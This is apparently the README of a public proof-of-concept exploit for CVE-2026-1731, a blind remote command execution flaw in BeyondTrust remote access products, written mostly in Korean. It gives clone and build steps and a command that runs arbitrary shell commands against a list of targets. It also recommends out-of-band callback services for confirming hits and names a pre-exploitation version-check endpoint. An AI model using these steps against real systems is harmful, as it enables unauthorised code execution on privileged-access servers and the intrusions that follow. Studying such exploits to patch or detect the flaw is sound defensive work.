
Proof-of-concept exploit for CVE-2026-1731, a blind RCE in BeyondTrust Privileged Remote Access and Remote Support, allowing remote command execution on vulnerable versions.
자세한 내용은 attackerkb.com의 분석을 읽어보시길 권장합니다.
이 PoC를 빌드하려면 다음 도구가 필요합니다: Git, rust
git clone https://github.com/jakubie07/CVE-2026-1731.git
cd CVE-2026-1731
cargo build --release
CVE-2026-1731 바이너리가 target/release에 위치합니다cd target/release
chmod +x ./CVE-2026-1731
./CVE-2026-1731 -h
cd target/release
./CVE-2026-1731.exe -h
./CVE-2026-1731 -h를 실행하여 사용 가능한 옵션 목록을 확인할 수 있습니다
./CVE-2026-1731 --targets targets.txt --command "whoami"
참고: CVE-2026-1731은 블라인드 RCE이므로 호스트에서 취약점 여부를 확인할 수 있는 응답이 반환되지 않습니다. 요청은 성공할 수 있지만 취약하지 않은 대상에서는 RCE가 트리거되지 않습니다. 대상에 대한 테스트에는 webhook.site 또는 PortSwigger's Burp Collaborator와 같은 서비스를 사용하는 것이 좋습니다. 이 PoC의 성공 또는 실패 여부는 서버가 상태 코드 200으로 응답하는지 여부에 따라 결정됩니다.
GET /get_rdf?comp=sdcust&locale_code=en-us 엔드포인트를 통한 악용 전 버전 확인 기능 추가